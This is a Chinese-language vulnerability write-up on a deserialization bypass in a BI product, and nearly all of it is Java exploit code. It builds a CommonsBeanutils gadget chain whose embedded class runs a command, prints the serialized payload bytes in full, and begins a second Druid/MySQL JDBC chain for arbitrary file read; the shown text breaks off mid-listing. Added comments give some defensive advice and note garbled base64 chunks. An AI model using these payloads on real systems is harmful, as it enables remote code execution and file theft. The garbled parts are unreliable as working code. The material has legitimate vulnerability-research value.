某软BI v5反序列化绕过


漏洞已提交,厂商已修复

cb链

某软存在 CommonsBeanutils(cb)反序列化链,先生成 cb 链的序列化字节数组。

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import org.apache.commons.beanutils.BeanComparator;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Arrays;
import java.util.PriorityQueue;

/**
 * Builds, prints and then locally replays a Java-deserialization payload based on the
 * commons-beanutils ("cb") gadget chain.
 *
 * <p>The chain, as the author's comments describe it: a serialized {@link PriorityQueue} carries
 * a {@link BeanComparator} whose {@code property} is {@code "outputProperties"} and two queue
 * slots holding the same {@link TemplatesImpl}. {@code PriorityQueue.readObject} invokes the
 * comparator, which reads the bean property {@code outputProperties}
 * ({@code TemplatesImpl.getOutputProperties()}), and that loads the class bytes stored in
 * {@code _bytecodes} through {@code defineTransletClasses()}. Per the author the embedded class
 * pops a calculator; the constant-pool strings ({@code java/lang/Runtime}, {@code exec},
 * {@code calc}) are readable in the byte dump that follows this class.
 *
 * <p>Defensive notes: nothing here depends on what the embedded class does — the dangerous step
 * is that attacker-controlled bytes reach {@code ObjectInputStream.readObject()} while these
 * gadget classes are on the classpath. A JEP 290 {@code ObjectInputFilter} (or an
 * application-level allow-list) that rejects {@code BeanComparator}/{@code TemplatesImpl}, or
 * keeping commons-beanutils out of the deserialization surface, stops the chain; the serialized
 * class names visible in the dump are also the signatures to alert on.
 *
 * <p>{@code implements Serializable} on this class is unused — nothing serializes {@code Main}.
 */
public class Main implements Serializable {

    /**
     * Reflectively sets a field declared on {@code obj}'s own class (inherited fields are not
     * found by {@code getDeclaredField}), bypassing access checks. Used to set private state of
     * TemplatesImpl, BeanComparator and PriorityQueue that has no setter.
     *
     * @param obj       target instance
     * @param fieldName name of a field declared on {@code obj.getClass()}
     * @param value     value to store
     * @throws Exception NoSuchFieldException when the field is not declared on that class, or
     *                   IllegalAccessException when the runtime refuses the access
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    /**
     * Decodes the embedded class file (the author's "malicious class that pops a calculator")
     * and wraps it in a TemplatesImpl prepared to load it.
     *
     * <p>NOTE(review): every chunk of the base64 literal ends in a stray {@code n}, which is not
     * standard base64 line wrapping; it looks like an extraction artifact of the original listing
     * (a backslash is also missing from a string literal in the Python script further down this
     * page) — TODO confirm against the original source.
     *
     * @return TemplatesImpl whose {@code _bytecodes} holds the decoded class
     * @throws Exception propagated from {@link #newTemplatesWithClassBytes(byte[])}
     */
    public static TemplatesImpl generateTemplates() throws Exception {
        byte[] code = Base64.decode("yv66vgAAADMANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClWn" +
                "AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABJMn" +
                "b3JnL2V4YW1wbGUvQ2FsYzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhn" +
                "bi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3Nln" +
                "cmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yn" +
                "Zy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3Vun" +
                "L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7n" +
                "AQAKRXhjZXB0aW9ucwcALQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzn" +
                "bHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhn" +
                "dG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphn" +
                "dGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVyn" +
                "bmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUvn" +
                "eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4Bn" +
                "AAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAKQEAClNvdXJjZUZpn" +
                "bGUBAAlDYWxjLmphdmEMAAkACgcALgwALwAwAQAEY2FsYwwAMQAyAQATamF2YS9pby9JT0V4Y2Vwn" +
                "dGlvbgwAMwAKAQAQb3JnL2V4YW1wbGUvQ2FsYwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pn" +
                "bnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjn" +
                "aGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVun" +
                "dGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhn" +
                "L2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEABwAIn" +
                "AAAAAAAEAAEACQAKAAEACwAAAC8AAQABAAAABSq3AAGxAAAAAgAMAAAABgABAAAACwANAAAADAABn" +
                "AAAABQAOAA8AAAABABAAEQACAAsAAAA/AAAAAwAAAAGxAAAAAgAMAAAABgABAAAAFgANAAAAIAADn" +
                "AAAAAQAOAA8AAAAAAAEAEgATAAEAAAABABQAFQACABYAAAAEAAEAFwABABAAGAACAAsAAABJAAAAn" +
                "BAAAAAGxAAAAAgAMAAAABgABAAAAGQANAAAAKgAEAAAAAQAOAA8AAAAAAAEAEgATAAEAAAABABkAn" +
                "GgACAAAAAQAbABwAAwAWAAAABAABABcACAAdAAoAAQALAAAAYQACAAEAAAASuAACEgO2AARXpwAIn" +
                "Syq2AAaxAAEAAAAJAAwABQADAAwAAAAWAAUAAAAOAAkAEQAMAA8ADQAQABEAEgANAAAADAABAA0An" +
                "BAAeAB8AAAAgAAAABwACTAcAIQQAAQAiAAAAAgAj");
        return newTemplatesWithClassBytes(code);
    }

    /**
     * Puts a fresh TemplatesImpl into the state the author lists as the preconditions for
     * {@code defineTransletClasses()}: {@code _bytecodes} populated, a non-null {@code _name},
     * {@code _class} still null and a {@code _tfactory} present.
     *
     * @param classBytes one class file, stored as the only entry of {@code _bytecodes}
     * @return the prepared TemplatesImpl
     * @throws Exception reflection failures from {@link #setFieldValue}
     */
    private static TemplatesImpl newTemplatesWithClassBytes(byte[] classBytes) throws Exception {
        // Class.newInstance() has been deprecated since Java 9; kept as the author wrote it.
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", new byte[][]{classBytes});
        // Conditions required to enter defineTransletClasses() (per the author).
        setFieldValue(templates, "_name", "name" + System.nanoTime());
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        return templates;
    }



    /**
     * Assembles the PriorityQueue / BeanComparator / TemplatesImpl object graph and serializes it.
     *
     * <p>Ordering: the comparator starts with a null property and the queue is filled with two
     * plain strings; only afterwards are {@code property} and the backing {@code queue} array
     * replaced by reflection. Presumably this keeps the comparator inert while the graph is built
     * (the author does not say; TODO confirm).
     *
     * @return Java-serialization bytes of the queue
     * @throws Exception from the reflective setters or from serialization
     */
    public static byte[] getPayload() throws Exception {
        // The prepared TemplatesImpl instance.
        TemplatesImpl obj = generateTemplates();

        // Comparator with no property yet; CASE_INSENSITIVE_ORDER is the fallback comparator.
        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

        // Making BeanComparator the queue's comparator means PriorityQueue ends up calling
        // BeanComparator.compare (author's note).
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        queue.add("1");
        queue.add("1");

        // Point the comparator's property at "outputProperties" so PropertyUtils.getProperty
        // ends up calling TemplatesImpl.getOutputProperties (author's note).
        setFieldValue(comparator, "property", "outputProperties");
        // Replace the backing array with two slots holding the TemplatesImpl so that the
        // first argument to PropertyUtils.getProperty is the TemplatesImpl (author's note).
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        // Serialize the graph.
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        return barr.toByteArray();
    }

    /**
     * Generates the payload, prints it as a Java array literal, and then deserializes it in this
     * JVM — so running {@code main} executes the embedded class locally. The sequence the author
     * describes: PriorityQueue.readObject → BeanComparator.compare →
     * TemplatesImpl.getOutputProperties → defineTransletClasses (class bytes loaded).
     *
     * @param args ignored
     * @throws Exception anything raised while generating or deserializing the payload
     */
    public static void main(String[] args) throws Exception {
        byte[] payload = getPayload();

        // Print the serialized bytes; this is the array shown in the output comment below the
        // class and re-used by the later hex-encoding program on this page.
        System.out.println(Arrays.toString(payload));

        // Local replay of the payload. The stream is never closed (harmless for a
        // ByteArrayInputStream, but a try-with-resources would be the idiom).
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload));
        // Deserialization reaches PriorityQueue.readObject, then BeanComparator.compare,
        // then TemplatesImpl.getOutputProperties, and finally defineTransletClasses loads the
        // class bytes (author's note).
        ois.readObject();


    }


}

//输出结果:byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 
115, 115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 
97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 
10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 
0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};

jdbc-mysql 任意文件读取(mysql 驱动反序列化利用失败:mysql 驱动(Connector/J)5.1.49 已修复了该反序列化问题)

以下脚本生成 base64 编码的序列化数据;服务器反序列化该数据后,再借助 mysql 驱动触发第二次反序列化。

package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.serialization.JDKSerializer;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;


import javassist.*;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.swing.UIDefaults;

import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

/**
 * Builds the second payload of the write-up: a serialized {@link Hashtable} whose two keys are
 * {@code javax.swing.UIDefaults$TextAndMnemonicHashMap} instances holding
 * {@code com.fr.json.JSONArray}s, one of which (two lists deep) wraps a {@link DruidXADataSource}
 * whose reflected fields point the pool at a MySQL JDBC URL. The serialized bytes are gzipped and
 * base64-encoded, the form the author says the target accepts and hands to
 * {@code JDKSerializer.CustomObjectInputStream}.
 *
 * <p>How deserializing the Hashtable reaches the data source's connection logic is not shown in
 * this listing (presumably through key comparison / toString of the JSONArrays — TODO confirm
 * against the server-side reader).
 *
 * <p>Defensive notes: the JDBC URL below carries the Connector/J properties
 * {@code allowLoadLocalInfile=true} (lets a malicious server request local files; see the fake
 * MySQL server script later on this page) and {@code autoDeserialize=true} together with
 * {@code statementInterceptors=...ServerStatusDiffInterceptor} (the driver-side deserialization
 * the author reports as fixed in driver 5.1.49). Any JDBC URL that untrusted input can influence
 * should be treated like code: pin driver class and host, allow-list connection properties, and
 * keep drivers current. On the serialization side an {@code ObjectInputFilter} / class allow-list
 * in front of the server's ObjectInputStream rejects the Hashtable/UIDefaults/JSONArray gadget
 * regardless of what it wraps.
 *
 * <p>Several imports above (javassist, collections4, POJONode, ObjectMapper, KeyPair, ...) are
 * leftovers of the commented-out experiments inside {@code main}.
 */
public class Main {

    /**
     * Builds, serializes, gzips and base64-prints the payload; then mirrors the server-side
     * stream construction without actually calling {@code readObject()}.
     *
     * @param args ignored
     * @throws NullPointerException et al. — every checked exception of the reflective and
     *         stream calls is simply declared rather than handled
     */
    public static void main(String[] args) throws NullPointerException, NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {

        //Test test = new Test();
        //User user = new User(test, "qqq");
        DruidXADataSource druidXADataSource = new DruidXADataSource();

        // The data source sits two ArrayLists deep inside the first JSONArray; the second
        // JSONArray wraps a plain string and only serves as the other Hashtable key.
        List<?> list_3 = new ArrayList<>(Arrays.asList(druidXADataSource));
        //JSONArray jsonArray_3 = new JSONArray(druidXADataSource);

        //new ObjectMapper().disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);

        List<?> list_1 = new ArrayList<>(Arrays.asList(list_3));
        List<?> list_2 = new ArrayList<>(Arrays.asList("1"));
        JSONArray jsonArray_1 = new JSONArray(list_1);
        JSONArray jsonArray_2 = new JSONArray(list_2);



        // uiDefaults is never used; UIDefaults$TextAndMnemonicHashMap is not publicly
        // accessible, so both instances are created through the reflective constructor and
        // filled via the superclass's (presumably HashMap's) put method.
        UIDefaults uiDefaults = new UIDefaults();
        Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
        Constructor<?> t_constructor = clazz.getDeclaredConstructor();
        t_constructor.setAccessible(true);
        Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
        Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
        Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
        putmethod.setAccessible(true);
        putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, 1);
        putmethod.invoke(textAndMnemonicHashMap_2, jsonArray_2, jsonArray_2);

        //HashSet set = new LinkedHashSet();
        //set.add(jsonArray_1);
        //set.add(jsonArray_2);

        // (Commented-out variant) use a harmless InvokerTransformer:
        //InvokerTransformer transformer_1 = new InvokerTransformer("toString", null, null);
        //TransformingComparator transformingComparator_1 = new TransformingComparator(transformer_1);

        //TreeMap treeMap_1 = new TreeMap<>(transformingComparator_1);
        //treeMap_1.put(textAndMnemonicHashMap_1, jsonArray_1);

        //TreeMap treeMap_2 = new TreeMap<>(transformingComparator_1);
        //treeMap_2.put(textAndMnemonicHashMap_1, jsonArray_2);

        // Fields two superclasses up (presumably DruidAbstractDataSource, cf. the imports) are
        // nulled out — presumably because they are not serializable or interfere with the
        // chain; TODO confirm. initedLatch lives one level up (DruidDataSource).
        Field statLogger = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("statLogger");
        statLogger.setAccessible(true);
        statLogger.set(druidXADataSource, null);
        Field transactionHistogram = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("transactionHistogram");
        transactionHistogram.setAccessible(true);
        transactionHistogram.set(druidXADataSource, null);
        Field logWriter = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("logWriter");
        logWriter.setAccessible(true);
        logWriter.set(druidXADataSource, null);
        Field initedLatch = DruidXADataSource.class.getSuperclass().getDeclaredField("initedLatch");
        initedLatch.setAccessible(true);
        initedLatch.set(druidXADataSource, null);
        // initialSize = 1: presumably so the pool opens a connection as soon as it initialises
        // — TODO confirm.
        Field initialSize = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("initialSize");
        initialSize.setAccessible(true);
        initialSize.set(druidXADataSource, 1);

        // Connector/J driver; the URL below is only meaningful for this driver.
        Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
        driverClass.setAccessible(true);
        driverClass.set(druidXADataSource, "com.mysql.jdbc.Driver");

        // Credentials are placeholders for the author's fake server (user name is overridden by
        // the user= parameter in the URL anyway).
        Field username = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("username");
        username.setAccessible(true);
        username.set(druidXADataSource, "root");

        Field password = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("password");
        password.setAccessible(true);
        password.set(druidXADataSource, "root");

        //Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
        //driverClass.setAccessible(true);
        //driverClass.set(druidXADataSource, "javax.naming.InitialContext");

        Field jdbcUrl = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("jdbcUrl");
        jdbcUrl.setAccessible(true);
